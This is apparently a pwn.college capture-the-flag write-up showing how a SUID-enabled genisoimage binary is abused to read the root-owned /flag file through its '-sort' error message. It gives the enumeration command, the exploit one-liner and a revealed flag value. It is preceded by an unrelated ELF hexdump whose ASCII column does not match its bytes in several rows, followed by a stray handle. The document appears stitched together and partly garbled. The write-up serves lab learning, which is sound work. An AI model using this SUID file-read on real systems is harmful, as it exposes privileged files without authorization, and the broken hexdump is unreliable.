00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 00000010 03 00 3e 00 01 00 00 00 60 10 40 00 00 00 00 00 |..>.....`.@.....| 00000020 40 00 00 00 00 00 00 00 48 30 00 00 00 00 00 00 |@.......H0......| 00000030 00 00 00 00 40 00 38 00 09 00 40 00 1a 00 19 00 |....@.8...@.....| 00000040 06 00 00 00 04 00 00 00 40 00 00 00 00 00 00 00 |........@.......| 00000050 40 00 40 00 00 00 00 00 40 00 40 00 00 00 00 00 |@.@.....@.@.....| 00000060 f8 01 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 |................| 00000070 08 00 00 00 00 00 00 00 03 00 00 00 04 00 00 00 |................| 00000080 38 02 00 00 00 00 00 00 38 02 40 00 00 00 00 00 |8.......8.@.....| 00000090 38 02 40 00 00 00 00 00 1c 00 00 00 00 00 00 00 |8.@.............| 000000a0 1c 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |................| 000000b0 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 |................| 000000c0 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 |..@.......@.....| 000000d0 e4 08 00 00 00 00 00 00 e4 08 00 00 00 00 00 00 |................| 000000e0 00 10 00 00 00 00 00 00 01 00 00 00 06 00 00 00 |................| 000000f0 e8 0d 00 00 00 00 00 00 e8 0d 60 00 00 00 00 00 |........`.@.....| 00000100 e8 0d 60 00 00 00 00 00 48 02 00 00 00 00 00 00 |..`.....H.......| 00000110 50 02 00 00 00 00 00 00 00 10 00 00 00 00 00 00 |P...............| 00000120 02 00 00 00 06 00 00 00 08 0e 00 00 00 00 00 00 |................| 00000130 08 0e 60 00 00 00 00 00 08 0e 60 00 00 00 00 00 |..`.......`.....| 00000140 f0 01 00 00 00 00 00 00 f0 01 00 00 00 00 00 00 |................| 00000150 08 00 00 00 00 00 00 00 04 00 00 00 04 00 00 00 |................| 00000160 54 02 00 00 00 00 00 00 54 02 40 00 00 00 00 00 |T.......T.@.....| 00000170 54 02 40 00 00 00 00 00 44 00 00 00 00 00 00 00 |T.@.....D.......| 00000180 44 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 |D...............| 00000190 51 e5 74 64 06 00 00 00 00 00 00 00 00 00 00 00 |Q.td............| 000001a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000001c0 08 00 00 00 00 00 00 00 52 e5 74 64 04 00 00 00 |........R.td....| 000001d0 e8 0d 00 00 00 00 00 00 e8 0d 60 00 00 00 00 00 |........`.@.....|

0xKAAAMMUUI

Challenge Name: genisoimage

Writeup from Program Misuse

Category: Program Misuse
Platform: pwn.college
Difficulty: Begineer Date: 2025-07-15
Author: Himanshu Parate

🧠 Summary:

The challenge abuses a SUID bit set on /usr/bin/genisoimage, allowing an unprivileged user to read the root-owned flag file at /flag.

🔍 Enumeration

ls -l /usr/bin/genisoimage

output:

-rwsr-xr-x 1 root root 47480 Sep  5  2019 /usr/bin/genisoimage

-The s in -rws indicates it’s a SUID binary. -genisoimage runs with root privileges.

🚀 Exploitation

The genisoimage is a command-line tool used to create ISO 9660 file system images (typically .iso) from files or directories.

But how can we reveal the flag by genisoimage , if it’s only used for creating iso’s?

the -sort command in genisoimage is used to sort the iso content made by weigths included in file given to -sort option of genisoimage.

We can parse /flag in -sort though it doesnt contain weight , the error can reveal the flag.

genisoimage -sort /flag

Output:

genisoimage: Incorrect sort file format
        pwn.college{ktPXbX6OZbHuRpPQ71lbIVqvy4Z.dVjNxwSM0IzMyEzW}

here the error simply reveals the flag.